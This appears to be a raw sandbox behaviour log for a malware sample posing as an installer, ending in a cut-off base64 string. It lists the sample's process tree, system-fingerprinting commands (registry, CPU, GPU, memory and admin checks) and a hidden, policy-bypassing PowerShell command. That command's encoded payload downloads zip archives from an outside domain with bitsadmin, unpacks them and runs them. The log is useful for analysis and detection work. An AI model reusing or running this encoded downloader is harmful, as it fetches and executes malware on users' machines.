PID 1292 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe
PID 2052 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2052 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2052 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3976 wrote to memory of 3756 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3976 wrote to memory of 3756 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3976 wrote to memory of 3756 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3976 wrote to memory of 640 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe
PID 3976 wrote to memory of 640 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe
PID 2052 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2052 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2052 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2728 wrote to memory of 1172 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2728 wrote to memory of 1172 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2728 wrote to memory of 1172 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2728 wrote to memory of 5100 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 2728 wrote to memory of 5100 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 2728 wrote to memory of 5100 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 2728 wrote to memory of 4596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 2728 wrote to memory of 4596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 2728 wrote to memory of 4596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 2052 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2052 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2052 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1960 wrote to memory of 348 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1960 wrote to memory of 348 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1960 wrote to memory of 348 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1960 wrote to memory of 816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 1960 wrote to memory of 816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 1960 wrote to memory of 816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 1960 wrote to memory of 1268 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 1960 wrote to memory of 1268 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 1960 wrote to memory of 1268 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 2052 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2052 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2052 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2628 wrote to memory of 2468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2628 wrote to memory of 2468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2628 wrote to memory of 2468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2628 wrote to memory of 3264 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 2628 wrote to memory of 3264 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 2628 wrote to memory of 3264 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 2628 wrote to memory of 1048 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 2628 wrote to memory of 1048 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 2628 wrote to memory of 1048 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 2052 wrote to memory of 1444 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2052 wrote to memory of 1444 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2052 wrote to memory of 1444 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1444 wrote to memory of 1428 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1444 wrote to memory of 1428 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1444 wrote to memory of 1428 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1444 wrote to memory of 4984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe
PID 1444 wrote to memory of 4984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe
PID 2052 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2052 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2052 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2052 wrote to memory of 5060 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2052 wrote to memory of 5060 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2052 wrote to memory of 5060 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 5060 wrote to memory of 1376 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\871dbc7a2ed62746e6998f48369f81dd\vlc.exe
PID 5060 wrote to memory of 1376 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\871dbc7a2ed62746e6998f48369f81dd\vlc.exe
PID 2052 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\explorer.exe

Processes

C:\Users\Admin\AppData\Local\Temp\install.exe

"C:\Users\Admin\AppData\Local\Temp\install.exe"

C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe

"C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "jre\.;jre\..;jre\asm-all.jar;jre\bin;jre\COPYRIGHT;jre\dn-compiled-module.jar;jre\dn-php-sdk.jar;jre\gson.jar;jre\jphp-app-framework.jar;jre\jphp-core.jar;jre\jphp-desktop-ext.jar;jre\jphp-gui-ext.jar;jre\jphp-json-ext.jar;jre\jphp-runtime.jar;jre\jphp-xml-ext.jar;jre\jphp-zend-ext.jar;jre\jphp-zip-ext.jar;jre\lib;jre\LICENSE;jre\README.txt;jre\release;jre\slf4j-api.jar;jre\slf4j-simple.jar;jre\THIRDPARTYLICENSEREADME-JAVAFX.txt;jre\THIRDPARTYLICENSEREADME.txt;jre\Welcome.html;jre\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild""

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 65001

C:\Windows\system32\reg.exe

C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List | C:\Windows\System32\more.com"

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 866

C:\Windows\SysWOW64\wbem\WMIC.exe

C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List

C:\Windows\SysWOW64\more.com

C:\Windows\System32\more.com

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List | C:\Windows\System32\more.com"

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 866

C:\Windows\SysWOW64\wbem\WMIC.exe

C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List

C:\Windows\SysWOW64\more.com

C:\Windows\System32\more.com

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List | C:\Windows\System32\more.com"

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 866

C:\Windows\SysWOW64\wbem\WMIC.exe

C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List

C:\Windows\SysWOW64\more.com

C:\Windows\System32\more.com

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19""

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 65001

C:\Windows\system32\reg.exe

C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93RXJTSGVMTCAtbm9wUm8gLUV4ZWNVVElvTnBPIEJZcGFTUyAtdyBISWQgLWVjIEpBQnBBR1VBVVFCeUFHUUFPUUJrQUVNQVBRQW5BR2dBZEFCMEFIQUFjd0E2QUM4QUx3Qm5BR0VBYVFCc0FITUFZUUJqQUdFQVpBQmxBRzBBZVFBdUFHTUFid0J0QUM4QVpnQjZBR0VBTHdCbUFERUFZUUF1QUhvQWFRQndBQ2NBT3dBZ0FDUUFTQUJrQUVFQVZnQjVBSEVBU0FBOUFFY0FZd0JOQUNBQVpRQjRBSEFBUVFCT0FHUUFMUUJCQUhJQVF3QklBRWtBVmdCbEFDQUFMUUJGQUhJQWNnQlBBSElBUVFCakFGUUFhUUJQQUc0QUlBQnpBRWtBVEFCbEFFNEFWQUJzQUZrQVF3QlBBRzRBVkFCSkFFNEFWUUJsQURzQUlBQWtBSFVBYXdCWUFGZ0FVZ0JHQUVrQVpRQTlBQ2NBYlFBekFESUFWd0JXQURVQVlnQlNBQzRBZWdCcEFIQUFKd0E3QUNBQUpBQlNBSElBVGdCb0FFZ0FTUUJsQUQwQUp3Qm9BSFFBZEFCd0FITUFPZ0F2QUM4QVp3QmhBR2tBYkFCekFHRUFZd0JoQUdRQVpRQnRBSGtBTGdCakFHOEFiUUF2QUdZQWVnQmhBQzhBWmdBMEFHRUFMZ0I2QUdrQWNBQW5BRHNBSUFBa0FITUFWUUJDQUhBQVlnQm1BRGdBUFFBbkFFd0FUd0F4QUdrQWJnQk9BRUVBTGdCNkFHa0FjQUFuQURzQUlBQWtBRzRBUlFBMEFFRUFUZ0JNQUdZQVBRQkhBR01BVFFBZ0FGTUFWQUJoQUhJQVZBQXRBR0lBYVFCVUFITUFkQUJTQUdFQWJnQnpBR1lBWlFCeUFDQUFMUUJsQUhJQWNnQlBBRklBWVFCakFGUUFTUUJ2QUU0QUlBQlRBR2tBYkFCbEFFNEFWQUJNQUhrQVl3QnZBRTRBVkFCSkFHNEFkUUJGQURzQUlBQWtBR0lBYkFCaUFHVUFjQUI2QUZvQVBRQW5BRFlBUkFCTkFFd0FWUUF1QUhvQWFRQndBQ2NBT3dBZ0FDUUFVZ0JuQUhvQU5RQlhBRXdBYmdBOUFDY0FhQUIwQUhRQWNBQnpBRG9BTHdBdkFHY0FZUUJwQUd3QWN3QmhBR01BWVFCa0FHVUFiUUI1QUM0QVl3QnZBRzBBTHdCbUFIb0FZUUF2QUdZQU13QmhBQzRBZWdCcEFIQUFKd0E3QUNBQVd3QnVBR1VBZEFBdUFITUFSUUJ5QUhZQWFRQkRBRVVBVUFCUEFFa0FUZ0IwQUcwQVFRQk9BRUVBUndCRkFGSUFYUUE2QURvQWN3QmxBRU1BZFFCU0FFa0FWQUJaQUhBQVVnQlBBRlFBYndCakFFOEFiQUFnQUQwQUlBQmJBRTRBWlFCMEFDNEFjd0JGQUdNQVZRQlNBRWtBVkFCWkFGQUFVZ0JQQUhRQVR3QmpBRThBVEFCMEFGa0FjQUJsQUYwQU9nQTZBRlFBVEFCVEFERUFNZ0E3QUNBQUpBQkpBRzRBUXdCSEFESUFNZ0JXQUVvQVBRQW5BRlFBWlFCdEFIQUFRd0J2QUc0QWRBQnlBRzhBYkFCc0FDY0FPd0FnQUNRQU5BQjVBRVlBWXdCS0FGWUFTZ0E5QUNjQWJBQTRBR1VBUmdCV0FFOEFVd0JUQUM0QWVnQnBBSEFBSndBN0FDQUFZd0JFQUNBQUpBQkZBRzRBZGdBNkFFRUFjQUJ3QUdRQVlRQjBBR0VBT3dBZ0FDUUFSQUF6QUdjQWJBQndBRDBBSndCb0FIUUFkQUJ3QUhNQU9nQXZBQzhBWndCaEFHa0FiQUJ6QUdFQVl3QmhBR1FBWlFCdEFIa0FMZ0JqQUc4QWJRQXZBR1lBZWdCaEFDOEFaZ0F5QUdFQUxnQjZBR2tBY0FBbkFEc0FJQUFrQUVZQVl3QnRBRllBVndCekFGa0FQUUFpQUNRQVpRQk9BSFlBT2dCaEFGQUFVQUJrQUVFQWRBQkJBRndBSkFCaUFHd0FZZ0JsQUhBQWVnQmFBQ0lBT3dBZ0FDUUFlQUJJQUdZQU5RQjRBRzhBVFFCMUFEMEFJZ0FrQUdVQVRnQjJBRG9BUVFCd0FIQUFSQUJoQUhRQVFRQmNBQ1FBY3dCVkFFSUFjQUJpQUdZQU9BQWlBRHNBSUFBa0FFNEFjd0JLQUhnQWRRQlpBRGdBVkFBOUFDSUFld0F3QUgwQVhBQjdBREVBZlFBaUFDQUFMUUJtQUNBQUpBQmxBRzRBVmdBNkFFRUFVQUJ3QUVRQVFRQjBBRUVBTEFBZ0FDUUFkUUJyQUZnQVdBQlNBRVlBU1FCbEFEc0FJQUFrQUdRQU1BQkVBRGNBV1FCd0FEMEFTZ0J2QUVrQVRnQXRBRkFBUVFCVUFHZ0FJQUF0QUhBQVFRQjBBRWdBSUFBa0FHVUFiZ0JXQURvQVFRQlFBSEFBUkFCQkFIUUFRUUFnQUMwQVl3QklBR2tBVEFCa0FGQUFRUUIwQUdnQUlBQWtBRFFBZVFCR0FHTUFTZ0JXQUVvQU93QWdBQ1FBU3dCT0FEWUFUUUJNQUhJQWJBQnFBRDBBSWdCaUFHa0FkQUJ6QUdFQVpBQk5BRWtBVGdBdUFHVUFXQUJsQUNBQUx3QlVBRklBUVFCT0FGTUFaZ0JsQUZJQUlBQjBBR0lBWlFCT0FHc0FJQUF2QUVRQVR3QlhBRzRBVEFCUEFFRUFSQUFnQUM4QVVBQnlBR2tBYndCU0FFa0FWQUJaQUNBQWJnQnZBSElBYlFCQkFFd0FJQUI3QURBQWZRQWdBSHNBTVFCOUFDSUFJQUF0QUdZQUlBQWtBRklBWndCNkFEVUFWd0JNQUc0QUxBQWdBQ1FBZUFCSUFHWUFOUUI0QUc4QVRRQjFBRHNBSUFBa0FIUUFRUUExQURBQVJRQTlBQ2NBUWdCSkFGUUFVd0JCQUdRQWJRQkpBRTRBTGdCRkFIZ0FSUUFnQUM4QVZBQlNBR0VBVGdCVEFHWUFSUUJ5QUNBQU1BQjJBR0VBYUFCc0FDQUFMd0JFQUU4QWR3QnVBRXdBVHdCQkFHUUFJQUF2QUhBQWNnQnBBRThBVWdCcEFGUUFlUUFnQUU0QVR3QnlBRTBBWVFCc0FDQUFKd0FyQUNRQVJBQXpBR2NBYkFCd0FDc0FKd0FnQUNjQUt3QWtBRVlBWXdCdEFGWUFWd0J6QUZrQU93QWdBQ1FBTWdCeEFHWUFhQUJKQUc4QVpRQTlBQ0lBSkFCRkFHNEFkZ0E2QUdFQWNBQndBRVFBUVFCVUFFRUFYQUFrQUVrQWJnQkRBRWNBTWdBeUFGWUFTZ0FpQURzQUlBQWtBR1FBZFFCdUFGUUFOd0JCQUZVQVBRQWlBR0lBYVFCMEFGTUFZUUJrQUcwQVNRQnVBQzRBWlFCWUFHVUFJQUF2QUhRQVVnQkJBRTRBVXdCbUFHVUFVZ0FnQUZjQVJBQmFBSE1BVHdCbkFDQUFMd0JrQUc4QWR3Qk9BRXdBYndCQkFFUUFJQUF2QUhBQVVnQnBBRzhBY2dCcEFGUUFlUUFnQUU0QWJ3QlNBRTBBUVFCc0FDQUFld0F3QUgwQUlBQjdBREVBZlFBaUFDQUFMUUJtQUNBQUpBQnBBR1VBVVFCeUFHUUFPUUJrQUVNQUxBQWdBQ1FBWkFBd0FFUUFOd0JaQUhBQU93QWdBQ1FBVndCTkFHVUFiQUJvQUZvQVN3QTlBQ0lBWWdCcEFIUUFVd0JoQUdRQWJRQkpBRzRBTGdCbEFGZ0FaUUFnQUM4QWRBQlNBRUVBVGdCVEFHWUFaUUJTQUNBQVZ3QkVBRm9BY3dCUEFHY0FJQUF2QUdRQWJ3QjNBRTRBVEFCdkFFRUFSQUFnQUM4QWNBQlNBR2tBYndCeUFHa0FWQUI1QUNBQVRnQnZBRklBVFFCQkFHd0FJQUFrQUZJQWNnQk9BR2dBU0FCSkFHVUFJQUFrQUU0QWN3QktBSGdBZFFCWkFEZ0FWQUFpQURzQUlBQkpBRVlBSUFBb0FDUUFTQUJrQUVFQVZnQjVBSEVBU0FBcEFDQUFld0FnQUdrQVJnQWdBQ2dBSkFCdUFFVUFOQUJCQUU0QVRBQm1BQ2tBSUFCN0FDQUFjd0IwQUVFQVVnQlVBQzBBWWdCcEFGUUFVd0IwQUhJQVFRQk9BRk1BUmdCRkFISUFJQUF0QUhNQVR3QlZBRklBUXdCRkFDQUFKQUJFQURNQVp3QnNBSEFBSUFBdEFFUUFaUUJUQUZRQWFRQk9BRUVBVkFCcEFFOEFUZ0FnQUNRQVJnQmpBRzBBVmdCWEFITUFXUUE3QUNBQWN3QjBBRUVBY2dCVUFDMEFZZ0JwQUZRQWN3QjBBRklBUVFCT0FGTUFSZ0JGQUhJQUlBQXRBSE1BVHdCVkFISUFRd0JsQUNBQUpBQlNBR2NBZWdBMUFGY0FUQUJ1QUNBQUxRQmtBRVVBY3dCVUFFa0FUZ0JCQUZRQWFRQlBBRzRBSUFBa0FIZ0FTQUJtQURVQWVBQnZBRTBBZFFBN0FDQUFVd0JVQUVFQVVnQjBBQzBBUWdCSkFIUUFjd0IwQUhJQVlRQnVBRk1BUmdCRkFISUFJQUF0QUhNQVR3QlZBSElBUXdCbEFDQUFKQUJTQUhJQVRnQm9BRWdBU1FCbEFDQUFMUUJFQUdVQWN3QlVBR2tBVGdCaEFGUUFhUUJQQUU0QUlBQWtBRTRBY3dCS0FIZ0FkUUJaQURnQVZBQTdBQ0FBVXdCVUFFRUFjZ0JVQUMwQVFnQkpBRlFBVXdCVUFISUFZUUJPQUhNQVJnQkZBSElBSUFBdEFITUFid0JWQUZJQVl3QkZBQ0FBSkFCcEFHVUFVUUJ5QUdRQU9RQmtBRU1BSUFBdEFHUUFaUUJ6QUZRQWFRQk9BRUVBZEFCSkFHOEFiZ0FnQUNRQVpBQXdBRVFBTndCWkFIQUFPd0FnQUgwQUlBQkZBR3dBVXdCbEFDQUFld0JwQUc0QWRnQnZBRXNBWlFBdEFHVUFXQUJ3QUZJQVpRQnpBRk1BU1FCUEFFNEFJQUF0QUVNQWJ3Qk5BRzBBUVFCdUFHUUFJQUFrQUVzQVRnQTJBRTBBVEFCeUFHd0FhZ0E3QUNBQVNRQk9BRllBYndCTEFFVUFMUUJsQUZnQVVBQnlBR1VBY3dCVEFFa0Fid0J1QUNBQUxRQkRBRThBVFFCTkFFRUFUZ0JrQUNBQUpBQjBBRUVBTlFBd0FFVUFPd0FnQUVrQVJRQllBQ0FBTFFCREFFOEFUUUJ0QUVFQWJnQmtBQ0FBSkFCWEFFMEFaUUJzQUdnQVdnQkxBRHNBSUFCSkFHNEFWZ0J2QUVzQVJRQXRBR1VBV0FCUUFGSUFSUUJ6QUZNQVNRQlBBRzRBSUFBdEFFTUFid0J0QUUwQVFRQk9BR1FBSUFBa0FHUUFkUUJ1QUZRQU53QkJBRlVBT3dBZ0FIMEFJQUJsQUZnQWNBQmhBRTRBWkFBdEFHRUFVZ0JEQUVnQVNRQldBRVVBSUFBdEFGQUFZUUIwQUdnQUlBQWtBSGdBU0FCbUFEVUFlQUJ2QUUwQWRRQWdBQzBBWkFCbEFITUFkQUJKQUc0QVlRQlVBRWtBYndCdUFIQUFRUUIwQUVnQUlBQWtBRElBY1FCbUFHZ0FTUUJ2QUdVQU93QWdBR1VBZUFCUUFHRUFUZ0JrQUMwQVFRQlNBR01BU0FCcEFIWUFSUUFnQUMwQWNBQmhBSFFBU0FBZ0FDUUFUZ0J6QUVvQWVBQjFBRmtBT0FCVUFDQUFMUUJrQUVVQWN3QlVBR2tBVGdCQkFGUUFhUUJQQUc0QWNBQmhBSFFBYUFBZ0FDUUFNZ0J4QUdZQWFBQkpBRzhBWlFBN0FDQUFSUUI0QUhBQVFRQnVBRVFBTFFCaEFISUFZd0JvQUdrQWRnQkZBQ0FBTFFCUUFHRUFWQUJvQUNBQUpBQkdBR01BYlFCV0FGY0Fjd0JaQUNBQUxRQmtBRVVBY3dCMEFHa0FUZ0JCQUhRQVNRQnZBRzRBVUFCaEFIUUFhQUFnQUNRQU1nQnhBR1lBYUFCSkFHOEFaUUE3QUNBQVJRQjRBRkFBWVFCdUFHUUFMUUJoQUhJQVF3QklBR2tBZGdCRkFDQUFMUUJRQUdFQWRBQklBQ0FBSkFCa0FEQUFSQUEzQUZrQWNBQWdBQzBBUkFCbEFGTUFkQUJwQUc0QVFRQjBBRWtBVHdCdUFGQUFZUUIwQUVnQUlBQWtBRElBY1FCbUFHZ0FTUUJ2QUdVQU93QWdBSElBUlFCTkFFOEFWZ0JsQUMwQVNRQjBBRVVBYlFBZ0FDMEFjQUJoQUhRQWFBQWdBQ1FBWkFBd0FFUUFOd0JaQUhBQU93QWdBR1VBVWdCQkFITUFSUUFnQUMwQVVBQmhBSFFBYUFBZ0FDUUFSZ0JqQUcwQVZnQlhBSE1BV1FBN0FDQUFaUUJTQUVFQWN3QkZBQ0FBTFFCd0FHRUFkQUJvQUNBQUpBQk9BSE1BU2dCNEFIVUFXUUE0QUZRQU93QWdBRklBUkFBZ0FDMEFVQUJoQUhRQVNBQWdBQ1FBZUFCSUFHWUFOUUI0QUc4QVRRQjFBRHNBSUFCOUFDQUFaUUJzQUZNQVJRQWdBSHNBSUFBa0FHZ0FhUUJvQUZRQVdBQlRBRW9BUFFBbkFHZ0FkQUIwQUhBQWN3QTZBQzhBTHdCbkFHRUFhUUJzQUhNQVlRQmpBR0VBWkFCbEFHMEFlUUF1QUdNQWJ3QnRBQzhBWmdCNkFHWUFMd0FuQURzQUlBQnVBRWtBSUFBdEFIQUFZUUIwQUVnQUlBQWtBR1VBYmdCV0FEb0FZUUJRQUZBQVJBQkJBRlFBWVFBZ0FDMEFiZ0JoQUUwQVJRQWdBQ1FBU1FCdUFFTUFSd0F5QURJQVZnQktBQ0FBTFFCcEFIUUFSUUJOQUZRQWVRQlFBRVVBSUFBbkFHUUFhUUJ5QUdVQVl3QjBBRzhBY2dCNUFDY0FPd0FnQUNRQVV3QllBRmdBZEFBMEFEMEFRQUFvQUNjQVFRQjFBR1FBYVFCdkFFTUFZUUJ3QUhRQWRRQnlBR1VBTGdCa0FHd0FiQUFuQUN3QUlBQW5BR01BYkFCcEFHVUFiZ0IwQURNQU1nQXVBR2tBYmdCcEFDY0FMQUFnQUNjQVRnQlRBRTBBTGdCTUFFa0FRd0FuQUN3QUlBQW5BRkFBUXdCSkFFTUFUQUF6QURJQUxnQkVBRXdBVEFBbkFDd0FJQUFuQUZRQVF3QkRBRlFBVEFBekFESUFMZ0JFQUV3QVRBQW5BQ3dBSUFBbkFHNEFjd0J0QUY4QWRnQndBSElBYndBdUFHa0FiZ0JwQUNjQUxBQWdBQ2NBWXdCc0FHa0FaUUJ1QUhRQU13QXlBQzRBWlFCNEFHVUFKd0FzQUNBQUp3QklBRlFBUXdCVUFFd0FNd0F5QUM0QVJBQk1BRXdBSndBc0FDQUFKd0J1QUhNQWF3QmlBR1lBYkFCMEFISUFMZ0JwQUc0QVpnQW5BQ3dBSUFBbkFHMEFjd0IyQUdNQWNnQXhBREFBTUFBdUFHUUFiQUJzQUNjQUxBQWdBQ2NBVUFCREFFa0FRd0JJQUVVQVN3QXVBRVFBVEFCTUFDY0FMQUFnQUNjQWNBQmpBR2tBWXdCaEFIQUFhUUF1QUdRQWJBQnNBQ2NBTEFBZ0FDY0FjZ0JsQUcwQVl3QnRBR1FBY3dCMEFIVUFZZ0F1QUdVQWVBQmxBQ2NBS1FBN0FDQUFhUUJHQUNBQUtBQWtBRzRBUlFBMEFFRUFUZ0JNQUdZQUtRQWdBSHNBSUFBa0FGTUFXQUJZQUhRQU5BQWdBSHdBSUFCbUFHOEFVZ0JsQUVFQVl3Qm9BQzBBVHdCaUFHb0FaUUJqQUhRQUlBQjdBQ0FBSkFBeEFFd0FWZ0JUQUVvQWF3QlZBRDBBSkFCb0FHa0FhQUJVQUZnQVV3QktBQ3NBSkFCZkFEc0FJQUFrQUVrQWF3Qk9BRW9BY2dCT0FGY0FQUUJLQUc4QWFRQnVBQzBBY0FCQkFIUUFTQUFnQUMwQVVBQkJBSFFBU0FBZ0FDUUFNZ0J4QUdZQWFBQkpBRzhBWlFBZ0FDMEFRd0JvQUdrQVRBQmtBRkFBUVFCVUFHZ0FJQUFrQUY4QU93QWdBRk1BZEFCaEFISUFkQUF0QUVJQWFRQjBBRk1BVkFCeUFFRUFiZ0J6QUVZQVJRQlNBQ0FBTFFCekFHOEFkUUJ5QUVNQVpRQWdBQ1FBTVFCTUFGWUFVd0JLQUdzQVZRQWdBQzBBUkFCRkFGTUFWQUJKQUU0QVlRQjBBRWtBVHdCdUFDQUFKQUJKQUdzQVRnQktBSElBVGdCWEFEc0FJQUI5QURzQWZRQWdBR1VBVEFCVEFFVUFJQUI3QUNBQUpBQlRBRmdBV0FCMEFEUUFJQUI4QUNBQUpRQWdBSHNBSUFBa0FERUFUQUJXQUZNQVNnQnJBRlVBUFFBa0FHZ0FhUUJvQUZRQVdBQlRBRW9BS3dBa0FGOEFPd0FnQUNRQVNRQnJBRTRBU2dCeUFFNEFWd0E5QUNJQUpBQXlBSEVBWmdCb0FFa0Fid0JsQUZ3QUpBQmZBQ0lBT3dBZ0FDUUFSUUJTQUVJQU13QkRBRkVBTWdBOUFDY0FRZ0JKQUhRQVV3QkJBRVFBVFFCcEFHNEFMZ0JGQUZnQVJRQWdBQzhBVkFCeUFFRUFUZ0JUQUdZQVJRQlNBQ0FBY1FCV0FIUUFkZ0JQQUNBQUx3QmtBRThBVndCdUFHd0Fid0JCQUVRQUlBQXZBRkFBY2dCcEFFOEFjZ0JKQUhRQVdRQWdBRzRBVHdCeUFFMEFZUUJzQUNBQUp3QXJBQ1FBTVFCTUFGWUFVd0JLQU